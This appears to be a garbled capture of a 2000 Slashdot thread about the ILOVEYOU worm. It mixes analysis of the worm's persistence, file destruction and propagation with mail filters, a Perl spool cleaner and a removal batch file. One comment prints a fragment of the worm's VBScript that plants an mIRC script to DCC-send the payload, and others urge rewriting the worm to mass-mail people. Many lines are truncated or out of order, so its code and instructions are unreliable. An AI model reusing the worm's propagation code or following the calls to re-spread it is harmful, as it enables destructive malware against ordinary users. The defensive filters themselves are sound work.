HKCU\Software\Microsoft\Internet Explorer\Main\Start Page [altered to attempt to download WIN-BUGSFIX.exe on browser startup]
HKLM\Software\Microsoft\Windows\CurrentVersion\Ru
HKCU\Software\Microsoft\WAB\... [one entry per address book entry plus a running total used during email propagation]
From all this you can work out the basic intention of the worm. It spreads via email propagation to everyone in your address book and by being sent via mIRC to other users. It maintains its hold on a machine by putting copies of itself in the Run and RunServices registry folders and by copying itself to files that look like existing files on the machine (presumably hoping the user has Hide Known File Extensions enabled).
I'm not sure about the
Other info: the file orginates in Manila, Philippines according to comments in the worm, the email title it uses is 'ILOVEYOU' and the email text reads 'kindly check the attached LOVELETTER coming from me.'
Especially when they make you admin NT servers.
/. crew are stuck in the same position as I am, dictated to by corporate or institutional policy. It's not necessarily a matter of coming out of the closet, but of frowning, lowering your head and mumbling about the boss.
I would imagine that a great number of the
"Share your knowledge. It's a way to achieve immortality." -- Dalai Lama
Anyways..what I don't get....I work for a government agency...our mail list has some 70,000 people in it......not to mention how many of those 70,000 have their own lists. Now first Melissa was out there, that was no problem for us because we were using CC Mail, after Melissa..our whole agency goes and switches to Outlook? umm.......explain the rationale behind this......? I say more viruses like this need to be spread around so some people will actually start using the gray matter between their heads....and why the fuck would you run an executable on your system if it seems so suspicious? :( but since we have the "source code" to it..I say we modify it to read something else.not "i love you" but.let's say..... "m$ sucks linux rocks" or something...and start mass mailing the M$ morons. :)
I don't know about the rest of you but I'll be glad when "god" (our main sysadmin that thinks he's right) sees his servers come to a halt and everything goes haywire..and I'll be there laughing my ass of at him....dunno. I haven't received this virus yet..
Why win9x really sucks
It's here already.. a bunch of e-mails coming from system administrators, university official mailers, etc.. A friend of mine opened it in my pc (while reading his mail) and I am realy annoyed. Does anyone have any patch already? Just deleting all the (32!!) damaged files is not going to tranquilize me This is a terrible proof of how weak is Windows and Outlook security.. how is it possible that you run a script which can rename files, overwrite them and even change the whole windows registry without at least being warned with something like "man, you are doing something dangeorous". ??
I got to work this morning and it had found its way to a lot of people's inboxes her at NCS in Iowa City, IA, USA. I didn't have any of the e-mails but everybody else seemed to. maybe nobody loves me... everybody knew about it and deleted the messages anyway. Nothing bad happened to us as far as I know.
Just after that previous post, I went to delete those 16 messages from my deleted items folder... as soon as I selected the first message, the preview pane failed to appear. I immediately jumped to the task manager and saw "Virus - Running". I killed that and Outlook, which had stopped responding. As far as I can tell, nothing was sent, and none of my files were changed.
What I mean is this. I did my internship at a government agency which pays old age pension and child benefits in The Netherlands. They used alot of the VB possibilities you find in Office. The espescially build a very tight integration between their e-mail and the database that they have. Because they did this in this way, they were able to streamline the organisation in a great way. Alot of stuff could be streamlined through the organisation without the need for prints and reprints etc. Thankfully they had a security-officer that would refused to open up the network to the internet and decided to install one internet terminal per department. (I hope they still have that policy)
What I meant to say was that in stead of laughing at all those people using MS-products and having problems with this VB-script, we should come up with a solution that is alot safer and gives companies the same ease of use of integrating it into their organisation.
Use Adsense for Charity
Dude, chill. Have some tea.
A lot of us *have* to use Outlook, which seems to be the most heavily affected email client, in government and/or school and/or industry. A lot of us have extensive address lists, and more importantly, this worm is actually destructive, unlike Melissa. Overwriting many, many, many different files with itself is Not Nice Behaviour.
Don't laugh at the victims for not using Linux. Laugh at them for being utter idiots who decide to run unknown VB scripts blindly.
From the BBC "Computer virus experts are currently battling to find an antidote to the problem, which is thought to be targeting idiots..." -Bruno "Truth Against the World" -FLW
I know we can rant on all day about how this never should have happened, but let's be a bit more productive and inform users how to protect themselves against this Love Letter Virus.
.vbs extension and containing the text ispyder@mail.com. Don't run the files, just delete them. You should also look into cleaning some registry entries, and perhaps also deleting a file called WIN-BUGFIX.EXE.
For this virus to work, it needs to run inside the Windows Scripting Host, which is sorta like a shell with UI.
The best way to protect your computer is to take 2 steps:
1) Close down all your open (writable) shares. If somebody has mapped a share on your drive to a drive letter on their computer, they can cause the files in that share to be overwritten by this virus (*.MP3, *.JPG, *.CSS to mention a few). So even your SAMBA shares aren't safe if they allow users to write on them.
2) If you are on a Windows 9x/ NT / 2000 / ME machine, go to your system directory and change the name of your Windows Scripting Host executable from wscript.exe to something like _wscript.exe. This makes sure that whenever your system tries to find the Windows Scripting Host for running any VBScript on your system, it can't find the EXE.
To see if any of your files got infected on a Windows Box, scan all your drives for a file with the
I hope this helps. Good luck!
BLaH(c)
Anyone got a decent sendmail solution? Pretty please? My sendmail skills blow =(
--
Peace,
Lord Omlette
AOL IM: jeanlucpikachu
[o]_O
I called SkyInet.net in Manila (whose servers were being used to distribute the second part of the virus, payload still unknown) about 10AM CET (8AM UTC) this morning.
I guess it was about 8PM there, and the lady on 24hr support sounded VERY harasssed. Still, nice to get a proactive response out of them quickly - they deleted the files within 1/2 an hour.
I think System Administrators should send a similar e-mail as this one every once in a while to all their users.
:)
An unharmfull version of it, that is, which only sends a reply back to the administrator. This way, he/she can warn the user for not ever opening anything he/she does know know of.
Of course, the administrator will have to fake his e-mail addy, but that shouldn't be hard
Just an idea... don't count on the web becoming virus-less... take countermeasurements.
-----------------------------
-----------------------------
If you can't blind them with brilliance, baffle them with bull.
anybody tried to ping www.skyinet.net recently?
or a traceroute?
small bit of a problem there methinks...
we have 10% (and rising) of the known world recursively re-infecting themselves with a virus that not only fscks up your hdd, but also tries to download a file from a web server and (surprise surprise), the web server falls over (and by the looks of it most of the surrounding infrastructure of that part of the net - unless they have purposefully disconnected themselves).
now what would happen if the script pointed itself at yahoo...
much easier than all this messing around with indirect ping triggers for launching nested attacks from previously compromised boxes.
ho hum. M$ we love you. not.
The only Good System is a Sound System
Too bad MS didn't include antivirus with the OS instead of IE.
love is just extroverted narcissism
After looking at the source code and seeing that it makes your start page in Internet Explorer one of 4 random sites at skyinet.net, then wouldn't it be a DoS against skyinet.net as well? skyinet.net is down right now, though I am not sure if it's because of this, or they are denying all requests until they can remove the pages.
They appear to be the #1 type of virus affecting people in the world today by numbers, just by looking at the symantec virus database.
This could all be fixed by Microsoft if they wanted to, yet they don't fix it, and everywhere I look, people are saying "it's not microsoft's fault"
How can a security hole as demonstrably large as this remain unfixed for so long? 1 jr. high kid in the phillipines writes a small virus saying how he hates to go to school, and in less than 2 days, he has disrupted communications in most of the world. (30,000 without email in my company alone today)
What can be done to focus people's attention on this security hole, nobody seems to care that it exists, and it is exploited over, and over, bringing companies to their knees time and time again.
or am I being overly critical here, and this isn't anything unreasonable? To me, it seems obvious, and I don't understand how the mainstream press hasn't begun to pressure Microsoft to stop these virus attacks by fixing their software.
________
1995: Microsoft - "Resistance is futile"
And to think, some of the West coast is still sleeping soundly in their beds. What a day they're in for.
I'll stick with procmail and elm, thank you.
* Subject:.*ILOVEYOU
simply because they've royally pissed off enough technically adept folks and are such a large target - if the DOJ/Courts doesn't take care of their unfair trading practices, the underground assassins will.
Something along the lines of the devil's dictionary of an absolute monarch: He can do anything he pleases, so long as he pleases the assassins.
try { do() || do_not(); } catch (JediException err) { yoda(err); }
The server where WIN-BUGFIX.EXE resides, www.skyinet.net seems to be unreachable all the day - seems to be a kind of "slashdot effect", although I'm pretty damned sure that this is not /. which caused this effect...
But we need to make sure everybody gets the warning. I propose that we put a vbscript attachment on the warning email so that it sends itself to everyone in the recipient's address book.
If you can read this, then I forgot to check "Post Anonymously".
Just announced on The Register a fix has been produced for the script and it can be downloaded from Dr Solomon's Web Site
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") theni ni") /if ( $nick == $me ) { halt }" /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
set scriptini=fso.CreateTextFile(folderspec&"\script.
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1=
scriptini.WriteLine "n2=
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
Is it making a script for mIRC?? Damn, thats evil.
--fatboy
From the article:
Visual Basic files used by webmasters
I feel that anyone calling themselves a master of the web, but who uses VB, probably has some issues.
--
E_NOSIG
There is a really quite simple fix for this, it comes down to basic security that should be praticed at all times. For example, this worm (among others) spreads it's disease though the use of the address book in outlook express.
This address book contants email addresses that the person enjoys send/receiving email with. You could say, the address contains a list of "freinds" to the user. The best way to fix being "labeled" as a "freind" is to use words like "I hate you" and "get away from me", spitting, cursing and talking bad about the pope also are some basic security measures you can take to avoid being put into this "address book" which will be used to send virii/worms to.
Also since this is spread though the use of outlook express, which is an email program. Email programs are used to communicate between to users or person. I can only conclude that communication between humans, in any form is a major security risk and should be stoped.
The two basic security prinicpals we learned here, is
1) communication between humans is bad and should not be allowed
2) be a complete jerk so that even if rule one is broken, you will still have a "fail safe" method in which people will avoid communicatioins with you.
"`Ford, you're turning into a penguin. Stop it.'" -THHGTTG
# grep ILOVEYOU /var/spool/mail/* |wc -l
12
nyahahahahah... should I warn them?
Anybody want to mirror the latest mcafee executables & dat files ?
If you look at the code for the virus, you will see that it uses the Windows Scripting Host. Any sysadmin who left Windows Scripting Host on their system is just asking for trouble. Ever since that came out a year ago, every security site and book has at least in brief mentioned it as a gaping security hole because Windows will automatically run scripts through it without checking for permissions, blah blah blah.
I and the two techs here at work removed it a while ago. We've received two of the emails from other companies, but they have fallen dead in the water.
Remove Windows Scripting Host from your computer, and you should be fine! So far, the best tool to use to remove WSH is fdisk. WSH comes as default on Win98 and W2k. NT can get it, but it is not installed as default.
I just got hit with the virus at my workplace. here's the funny part. The extremely attractive female coworker who sent it to me(twice!) would be the LAST person who would ever love me, or even talk to me.
Talk about the ultimate irony.
There is an article and already an update.
Happened in our work today too. The preview pane in Outlook doesn't set it off though. Something to note is it end in .txt.vbs On a standard install of windows the filename extensions are turned off so it *looks* like a .txt file on first glance. In most cases that's all it takes to open it. Not a microsoft fan.
Nice to see some innovation at work here...
Microsoft: Don't Innovate, Regurgitate!
So far this morning I have received 6 copies of the I Love You virus, and 7 warning emails about the virus from sysadmins, friends, and concerned department secretaries. I sometimes wonder if the barrage of alerts I get is worse than the actual virus.
Idol Star Astronomer
normal(adj)- people who don't sit on slashdot all day wondering why everyone else isn't building robots [DECS]
Oh, great.
WASHINGTON, D.C. (Reuters) - The "I Love You" e-mail virus, which has crippled hundreds of businesses and ISPs in the U.K., has been traced to an American computer discussion site. "We were baffled as to where this deadly new threat had come from," said Richard Josephs of the FBI's computer crimes division, "until we learned that the source code to the virus was available on Slashdot.org." "Source code" refers to the computer-language instructions that a programmer "compiles" to produce a wide variety of applications, from Microsoft Word to Microsoft Excel.
The FBI was informed of the code at 8:03 Wednesday by a courageous anonymous hero, who claimed he has been monitoring the slashdot.org page for evidence of illegal activity ever since it published the "source code" for DeCSS, a program invented by hackers to illegally copy and resell copyrighted DVDs over the Web.
The Department of Justice is preparing to file charges against the hacker-friendly slashdot.org, despite protests from its owners. One, a shadowy figure known only as "CmdrTac0" claims that the source code could have come from anyone who received the virus. But experts say this is unlikely, because there is no known way to keep Microsoft Outlook from launching the virus program upon receipt.
We have been unable to find the anonymous hero who reported the presence of the code on Slashdot.org, but the FBI official who spoke with him said he repeatedly asked if they had the unlisted phone number of actress Natalie Portman.
-----
Go ahead, blame me... I voted for Nader!
I must say, I feel even better than I usually do about using such a wonderfully fabulous mail program. Being a teenage boy, I have to mack it with the ladies, that goes without saying. In an ever technology laiden world, the girls I chill with tend to want to chat over *shudder* AOL, so I'm more than happy to use AIM, but when it comes to getting gobs and gobs of terrible fwd's from them, a smile comes to my face when they write a day later and say, "DON'T OPEN THAT OTHER MAIL I SENT YOU!! IT HAS A VIRUS!!" Who would have thought "Happy99.exe" could be evil? ;) Thanks pine!
-- From my Best Friend (Written to me over ICQ): "i was gonna go to a party...but i had to reinstall windows"
Everything else is just red herring. What me paranoid?
Wyse not wise
And you seem to forget that *THIS* right here is text. Text *IS* the medium we use...some people just like it wrapped up in graphics, thinking this makes life eaiser.
Now...Dissing Unix? Keep in mind that VMS->WNT 3.1 was going to be a 'better unix than UNIX' and the model of the X window terminal was dead. (BTW, anyone have copies of these original Micro$oft proclimations) Today, it is Unix and M$...that is about all that is left standing, even Apple is going to Unix. And the X terminal model is alive and well, re-done as the 'application server' Citrix.
So, like it or not, AC, Unix *HAS* WON! M$ wants to BE unix, Apple is moving to Unix....its all over for you but your crying. Is Unix the best model for an OS? Perhaps, perhaps not, and perhaps one day Unix will be replaced. But for right now, Unix is the horse to beat!
If it was said on slashdot, it MUST be true!
I am sick and tired of having to deal with microsoft's insecure software. Microsoft has cost me and my company Millions ever cince we started using their software. Second we had no choice to use their software. When microsoft is shown the problems in their products they say "It's not a problem it's a feature" WEll it's time to start suing them.... if they write poor software, they should pay the piper. And the man that authorized how outlook works should be pubically impaled. (forgive the spelling, I'm typing on a server keyboard as admin trying to fix this microsoft crap)
Do not look at laser with remaining good eye.
Moderators, please moderate the parent up! Thanks for posting it, it works great. We've now re-enabled external email and it's bounced about a million virus emails so far...
Pete.
Based on the MELISSA hack of yore. It's working for us, and will return the mail to sender. This will work as long as a variant doesn't appear with a different subject (at which time, you simply add another pattern and appropriate error message) Be on the lookout for the tab-separation that is required for sendmail.cf files. The MELISSA hack comes with version comes with 8.9.3, so have a look at the features for recompiling a new CF file.
D{Lpat}ILOVEYOU
D{Lmsg}This message may contain the ILOVEYOU virus.
R${Lpat} $* $#error $: 553 ${Lmsg}
RRe: ${Lmsg} $* $#error $: 553 ${Lmsg}
Funny that it takes ;-)
mass communication and buggy software
to spread love on a global scale
If Napster, etc can be liable for what users do with its technology, Microsoft is grossly negligent for what users do with its technology.
--mark
"A Class Action, Part II"
Just shut down our exchange server (here in the US) in the past 10 min (that's why I'm on
The problem is not the server.
Shutting down the mailserver doesn't help much.
The problem is Outlook and Outlook express.
Anybody who is using Eudora (Pro) or Lotus Notes doesn't have a problem at all.
And this "virus" doesn't work on MacOS, Linux, Solaris.
Only if you are using that crap from Redmond you have a problem.
The only reason why mailserver are going down is the sheer number of messages.
I also found out that this "virus" damaged a lot of
But this was because the infected machines replaced lot's of files....
When I started Outlook this morning I had 4 messages from the sysadmin warning me not to open these things. There were also 2 copies of the virus which I deleted. I just started up Outlook to see if I'd received any more copies of the virus, and guess what? There weren't any. Instead there's 5 more warnings from the sysadmin.
in case nobody's posted this yet - i didn't see it anywhere - here's the source for all you VB hackers:
:P
http://option8.com/love.txt
i tried posting it directly, but got: Lameness filter encountered. Post aborted.
- Entertaining Bits from the Ancient Kernel Tree
Tell me how? Does the preview pane in Outlook execute an attachment? Does it execute a VBS script?
The preview pane will run scripts embedded in HTML/MIME mail, unless you have scripting disabled in IE's "Internet" zone. Good day.
Everyone bashes MS, with good reason, but could something similar be written in AppleScript for the Macintosh?
This is on topic, but it's going to take me a bit to get to it. Moderators, have faith :) .XLS | .PPT) files" .DOC attachments in their mail, and having a macro virus attack them. :)
One of the reasons that the government thinks it'd be a good thing to break Microsoft up the way they want to, is that without having an OS division, MS-Apps would do things like port Office to Linux.
Red Hat, among others, sees this as a good thing, since the #1 reason they get for people not wanting to switch over to linux is "I can't use my (.DOC |
I think about the porting of Office to Linux and see many others adopting Linux as a result. I then see clueless newbies who run as root all the time opening
And if MS-Apps ports Office over, why not Outlook? Right now, most folks think it's fairly rare to see a virus on Linux. If Microsoft ports Office/Outlook over, and clueless newbies/managers get ahold of it, the scarcity of viruses for Linux will vanish.
I can see the headlines now: "Melissa ported to Linux!"
I think I'll stick to Pine
-Denor
Why is everybody so concerned?
If every software company made their e-mail programs like Outlook this world would be a better place. Everybody would receive messages all day, telling them how much people love them! Now seriously, that's not a bad thing, is it?
I guess nobody loves me.
It's a bit like a popularity contest. The more peoples addressbooks you're in the more copies of the trojan you'll get.
BTW, all these filters being put in place. Do they just use the subject line? If so wouldn't it be trivial to change that and send it off again?
Deleted
Hm, now that I got a love letter from my boss, can I sue him for sexual harrassment and make big cash? ;)
[Disclaimer: I didn't actually. Being at a Unix-only place definitely has good sides.]
This message is provided under the terms outlined at http://www.bero.org/terms.html
If you examine the code you'll see that the JPG and JPEG files are deleted, yes, but MP2 and MP3 files are marked with the Hidden Attribute.
You guys are short-sighted. What this really means is this :- There are so many people in the world yearning for love. The world is love deprived. They are being exploited by the virus writers. Go loving around!
Taking a biological view of it, you can see that what many trumpet as "standardization of platform" may create efficiencies for developers, but also for viruses. Any biologist knows that a genetic monoculture is subject to sudden and massive extinction. Imagine a virus that simply and truly wiped disks clean of windows; that it was 100% virulent and contagious; if not for non-windows users, there could be no computers left running. Or take the recent hacking of AboveNet; it was characterized as a denial of service attack, but it wasn't bandwidth flood. It seems to have been something that allowed routers to be taken down; it's easy to see that the severity of the assault would be proportional to the uniformity of their routers.
Vive la difference or die.
Boss of nothin. Big deal.
Son, go get daddy's hard plastic eyes.
Expanding a vast wasteland since 1996.
Well at 10:45 CST NCS shut down their exchange server. It probably won't affect business too much except people will have to talk to each other on the phone (GASP!). Somebody finally loved me which makes me happy though. What about people that aren't here today that come in tomorrow though. Maybe more harm will come tomorrow.
We contracted this this morning, though some people got it yesterday. We have generated a quick fix today, that has worked for us. it can be got from: http://www.gotan.org/tmp/scripts.zip enjoy, Tim.
and then God said: 'void *universe; while(1) if(create_order(universe)) create_chaos(universe);'
It hit us before 9 this morning, 250 users w/o e-mail.
Well then this is your chance to break free - "Look at what M$ has let happen to us! Let's change."
Remember that this virus will have affected your managers. Let them know there is an alternative and they might act while the problem is fresh in their minds.
TWW
"Encyclopedia" is to "Wikipedia" what "Library" is to "Some people at a bus stop"
Someone obviously does not like SkyInet
Thank you, Microsoft! Without your wonderfile innovation, this kid would still be an unknown...
"Widget choice makes me horny." -
One of the programmers were I work has gone through the .vbs file and summarized what it does and how to fix it. You might have a better chance reading this than clicking on the slashdotted links that CT just added.
n \MSKernel32 n Services\Win32DLL .vba, .vbe, .js, .jse, .css, .wsh, .sct, .hta, .jpg, .jpeg with a copy of itself. .css, .js, .jse, .hta, .jpg, .jpeg files. .mp3 and .mp2 file on the system (A file called Bobs.mp3 will have a matching Bobs.mp3.vbs)
.vba, .vbe, .js, .css, .wsh, .sct, .hta, .jpg, .jpeg files. R un\MSKernel32 R unServices\Win32DLL
OK, here's a summary of what the script file does:
1. Disables the timeout in the scripting host so that the script may run indefinitely. (The default behavior kills a script after a time limit because it is assumed to have failed).
2. Copies itself to c:\windows\system\mskernel32.vbs.
a) Adds this to registry at HKLM\Software\Microsoft\Windows\CurrentVersion\Ru
3. Copies iteslef to c:\windows\win32dll.vbs
a) Adds this to registry at HKLM\Software\Microsoft\Windows\CurrentVersion\Ru
4. Copies itself to c:\windows\system\lover-letter-for-you.txt.vbs
5. Creates a file called c:\windows\system\love-letter-for-you.htm, which downloads itself and runs the script. (Tells the user it needs an ActiveX control so the user must click a button to run it).
6. Iterates through all the files in the system on fixed drives mounted network drives (not unmounted shares)
a) It overwrites all files with the extensions
i) Note: this mearly destroys
b) It writes a copy of itself for every
c) If a folder containing MIRC is found, it writes a script into the script.ini (run at startup) that send the previously generated love-letter-for-you.htm to every person in any group you join.
7. If outlook is installed, it goes through every name in every address book and forward the message you probably received.
8. If c:\windows\system\winfat32.exe exists (which isn't part of a normal install and the script dosen't install it so I don't know where it comes from), it resets the start page to download an EXE. Again the user will be prompted to accept and run the file.
a) If the user manages to download this program, and the script is run again, it kindly resets the home page to blank.
So, to remove this virus, delete:
All
c:\windows\system\mskernel.vba
c:\windows\system\lover-letter-for-you.htm
c:\windows\system\lover-letter-for-you.txt.vbs
c:\windows\system\win32dll.vbs
your MIRC script.ini
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
HKLM\Software\Microsoft\Windows\CurrentVersion\
HKLM\Software\Microsoft\Windows\CurrentVersion\
HKCU\Software\Microsoft\Windows Scripting Host\Settings\Timeout
All-in-all it's pretty destructive and pretty dumb, definitely the product of some 13 year olds with terrible english.
"Never wrestle with a pig. You both get dirty and the pig likes it."
That's all well and good, but I wish they'd keep in mind that he wouldn't have been able to do any of this mischief without the months of labour on the part of Microsoft engineering that laid the groundwork for this sort of thing. OLE, VB, Outlook, etc all working together to help viruses propogate.
It's as if Microsoft has been stacking tubes of dynamite in the town hall for months, and one day some fruitcake comes in with a lit match. Sure, the fruitcake is guilty, but there's some serious negligence here as well...
Jeremy, your friendly Slashdot anti-M$ zealot
I don't care if it's 90,000 hectares. That lake was not my doing.
This Trojan was obviously written by Lars Ulrich of Metallica.
In a surprisingly clever ruse to throw us off his trail, he programmed it to delete certain files in formats other than MP3.
Come crawling faster...
Obey us, Napster!
Your life burns faster...
Obey us, Napster!
Napster
Napster of the Internet is a terrible thing...
treating our art like it's a commodity.
Robing us blind, we can't afford a thing...
Bootleg our work, but not as MP3s!
Napster
Napster
Then news of this virus starts going around, and I look closely at the fax. It says it "originated from a (COMPANY NAME) Faxcom," and has the attachment "LOVE-LETTER-FOR-YOU.TXT.vbs . Apparently, our fax number was in her computer, and it faxed us a text copy of the virus. Anyone want it? :)
-brennan
We have people running 98 and 2000 and it came from both. There is a setting depending on the Internet zone you have assigned as to whether it automatically runs the HTML scripting.
~ ~~~
At the end of the script is the HTML code and of course this runs in the preview pane, via the OLE wscript file in the Windows directory. Sooo glad I don't use it, and have my Internet zones set up so that scripts don't run except in those sites I allow..
It seems that the HTML code at the end of the E-mail (not the attachment) tries to open the attachment via Active Scripting..
It says in the header of the HTML.. "simple but i think this is good..."
Is this a half finished virus, because it looks it to me. Some kid in school half written it, shows his friend, who then sets it free before it is finished properly...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Everyone keeps saying that this beast deletes MP3 files. It does not, at least not where I work. For an MP3-file A.mp3, it creates an A.mp3.vbs that contains the worm. The original file is left intact.
It _does_ delete JPEG-files, though. It creates a file A.jpg.vbs, and then deletes the original file. Check the code, it's all in there.
To sum up, you loose your porn, but get to keep your pirated music. This must have been written by one of those extremist women.
I found this news article only just a few minutes ago...
WASHINGTON:
U.S. District Judge Thomas Penfield Jackson has issued a ruling in the Microsoft VS the Department Of Justice case regaring the breakup of Microsoft into 2 or possibly 3 'Baby Bills'.
Judge Jackson was quoted as saying, "Only moments ago, I received a rather bizaar email from Mr. Gates, titled as "I LOVE YOU" in the subject line. At first, I thought it was perhaps just another plea to 'let [him] innovate', but after opening the attachment, I found myself infected with a virus. I am very upset with Mr. Gates."
The breakup is to proceed immediatly.
#!/bin/bash
### Run this script for a Great Time with Me! ###
foreach luser in `cat
foreach file in `find
Now I am an eeevil cracker. Muahahaha!
I think, therefore thoughts exist. Ego is just an impression.
First, you need to patch Sendmail ...
Go to this excellent sendmail patch: sendmail patch by Koos van den Hout
Then, to get rid of the virus that is already in your spool files (because if your users were smart enough not to click on it this wouldn't be such an epidemic). I've written a little Perl-diddy that acts like an anti-virus. Rudementary usage tactics are in the comments. It will clean the user's spool file, removing all ILOVEYOU virus messages. Use and redistribute. It worked like a charm for me.
It is VITALLY important that you put the sendmail patch in place first.
#!
#
# kill_lover
#
# Author: Matt Luker, kostya@redstarhackers.com
#
# This little hack will iterate over a file, grabbing
# email messages. If the message is clean (i.e. not
# the ILOVEYOU), it is written to file. If it is not
# clean, it is thrown away.
#
# An extra file is generated, call $file.suspect. It
# may or may not have viruses in it. It is safe to
# delete it once you are done.
#
# I find the following command to work:
# cd
# find . -name \* -exec kill_lover.pl {} \;
#
my $file=shift;
if ($file eq "") {
print "Please enter a filename!\n";
exit 1;
}
print "Looking for a lover in $file
open MAILFILE, $file;
open CLEANSED, ">$file.clean";
my $message="";
while () {
if (/From
# Ok, we've found a message beginning, which means our
# last message is done.
# Now check the message to see if it is the ILOVEYOU
# virus.
if ($message=~/Subject: ILOVEYOU/) {
# This is a potential ILOVEYOU virus
print "Killing a lover
} else {
print CLEANSED $message;
}
$message="";
$message=$_;
} else {
$message.=$_;
}
}
close CLEANSED;
close MAILFILE;
`mv $file $file.suspect`;
`mv $file.clean $file`;
Enjoy!
"Doubt your doubts and believe your beliefs." -- Switchfoot, Ode to Chin
Someone has posted a recipe for postfix here
I'm told you can just adapt the Melissa one for sendmail
Here is the recipe for exim
You need to call this filter from your config file, so add
to the main section - remember to HUP or restart exim after this.
The list archives have some ongoing discussion on this - including some more devious filters for VBS scripts.
I didn't get a copy either.
We put in email filters to stop the propergation of the virus. I put in an exception for email to me. We've caught tens of thousands of emails but still not a single one for me.
here's one for your /etc/procmail rc if you're using procmail on your server. even though it's not going to affect non windows people, it's nice sometimes to protect your customers and/or clients that are...
/etc/procmailrc
:0:
* Subject:.*I.*LOVE.*YOU
| rm -f
many varients can be made... this is the quick and dirty version that i did, and it gets the job done. drop it into
"Here's 50 bucks, take this in case I get drunk and call you a bitch later." - Ricky (Vince Vaughn)Made (2001)
Also, a computer system should have some semblance of security against stupid actions by ordinary users. After all, we all do stupid things at one time or another. At the very minimum, the OS should differentiate between superuser and ordinary mode. Even if it doesn't require a password (I am thinking single-user Macs or Windows), at least the user would get a warning before something happened.
Finally, why are we stupid enough to put up with this stuff? We should demand better.
It's not the user's fault that their crappy MS software allows programs to be embedded in email and then executed when you read the damn things.
Besides which, 99% of people using computers don't understand what they are doing anymore than people really understand their car engine; should nobody use computers unless they can explain every line of code in Word?
TWW
"Encyclopedia" is to "Wikipedia" what "Library" is to "Some people at a bus stop"
Hmmm... Maybe Microsoft should --innovate-- some security features into Outlook.
-- Phenym
The preview pane will not activate it unles you are the lamest Sysadmin on the planet! you should have long long ago fixed your outlook to NOT use word as the reader, do not execute anything, and basically turn off all of the backdoors that microsoft put in that they call "features" but we know were put ther eto snoop/attack your pc.
If your users tell you all I did was put the mouse over it they are lying (users lie 100% of the time... get used to it) or you had their outlook configured to activate every file it gets.
Do not look at laser with remaining good eye.
Caution and warning.
This trojan will propagate to FAX machines, if the machine is a contact in the Outlook address book.
It doesn't just eat bandwidth, it eats paper and phone connections too.
-- What you do today will cost you a day of your life.
I have received so many spam mails about non-existent viruses, that I make it a practice to educate all my friends, family, staff and partners to CHECK IT OUT FIRST (i.e.: find supporting documentation on the Symantec Anti-Virus research page) before mailing everybody in their address book. The more people I point in this direction, the less spam I get about viruses. Remember the Frog game that was supposed to be a virus? I received over 150 emails about that one alone.
We have to remember that most people really don't know about such things, and honestly think they're doing everyone a favour with these email notifications. Let a person send email ad-hoc, and they'll send everything to everyone; teach them how to be responsible users and distributors of information, and the spam traffic will drop dramatically.
My 2 cents
"Content's a bitch."
In case anyone reads that and wonders, there's no chance of those spreading or doing anything. We were very careful about not letting those critters escape. Aside from that, they wouldn't have worked outside of our organization (Notes "/O=" organization, that is), would be stripped out by a Notes MTA-SMTP gateway so they couldn't travel the net, didn't destroy files (well, except unsaved work :), and had to be opened in Notes to run. So there's no possible virus danger or scare there, lest anyone wonder.
The following batch file syntax will remove ILOVEU from a WinNT machine, and show you all the damaged files. Perhaps someone can post a version for Win9X? Anyone have any improvements or suggestions?
.cmd file ====
b s
u n","MSKernel32",, >> %TEMP%\ihateu.inf u nServices","Win32DLL",, >> %TEMP%\ihateu.inf
/s /b *.vbs > IHATE.TMP
Garrett
==== cut here and past into a
@echo off
if exist %SYSTEMROOT%\win32dll.vbs echo You were infected with love!
if not exist %SYSTEMROOT%\win32dll.vbs echo You aren't infected...
if not exist %SYSTEMROOT%\win32dll.vbs GOTO END
if exist %SYSTEMROOT%\win32dll.vbs del %SYSTEMROOT%\win32dll.vbs
if exist %SYSTEMROOT%\system32\mskernel32.vbs del %SYSTEMROOT%\system32\mskernel32.vbs
if exist %SYSTEMROOT%\system32\love-letter-for-you.txt.vbs del
%SYSTEMROOT%\system32\love-letter-for-you.txt.v
if exist %SYSTEMROOT%\system32\love-letter-for-you.htm del %SYSTEMROOT%\system32\love-letter-for-you.htm
echo [version] > %TEMP%\ihateu.inf
echo signature="$Windows NT$" >> %TEMP%\ihateu.inf
echo. >> %TEMP%\ihateu.inf
echo [DefaultInstall] >> %TEMP%\ihateu.inf
echo DelReg=KeyToRemove >> %TEMP%\ihateu.inf
echo. >> %TEMP%\ihateu.inf
echo [KeyToRemove] >> %TEMP%\ihateu.inf
echo HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\R
echo HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\R
%SYSTEMROOT%\system32\Rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 %TEMP%\ihateu.inf
del %TEMP%\ihateu.inf
echo Love has been eradicated from this computer...
echo.
echo Let's find files that may have been infected
echo This will search all local and networked drives
echo So be prepared to wait.
echo.
echo Recommendation: Delete all files listed
echo.
echo Results will be written to IHATE.TXT
echo.
echo.>IHATE.TXT
for %%x in (a b c d e f g h i j k l m n o p q r s t u v w x y z) do if exist %%x:\nul (
echo Searching %%x:
%%x:
cd\
dir
type IHATE.TMP
type IHATE.TMP >> IHATE.TXT
)
del IHATE.TMP
:END
echo Finished.
Life is like an egg better scrambled than fried. -- Ken Sawatari
Apparently Lloyds bank here in the UK has been hit by this.
It looks much worse than melissa and I am sure somebody will change the subject line / content of the message to lure more clueless lusers.
All those years of using Windows has done one thing for me. I fixed this threat before it happened at my company.
The fix is actually quite easy, and will work until the next version comes out. All I did was use the MS Outlook "rules system" to create a "rule" that deleted any messages with an "ILOVEYOU" subject. My users never saw the message at all.
It did come a little too late. One of the execs lost 4500 JPGs from his hard drive. Wonder what THOSE could've been? (EG)
I'm just kidding. They were just his vacation pics.
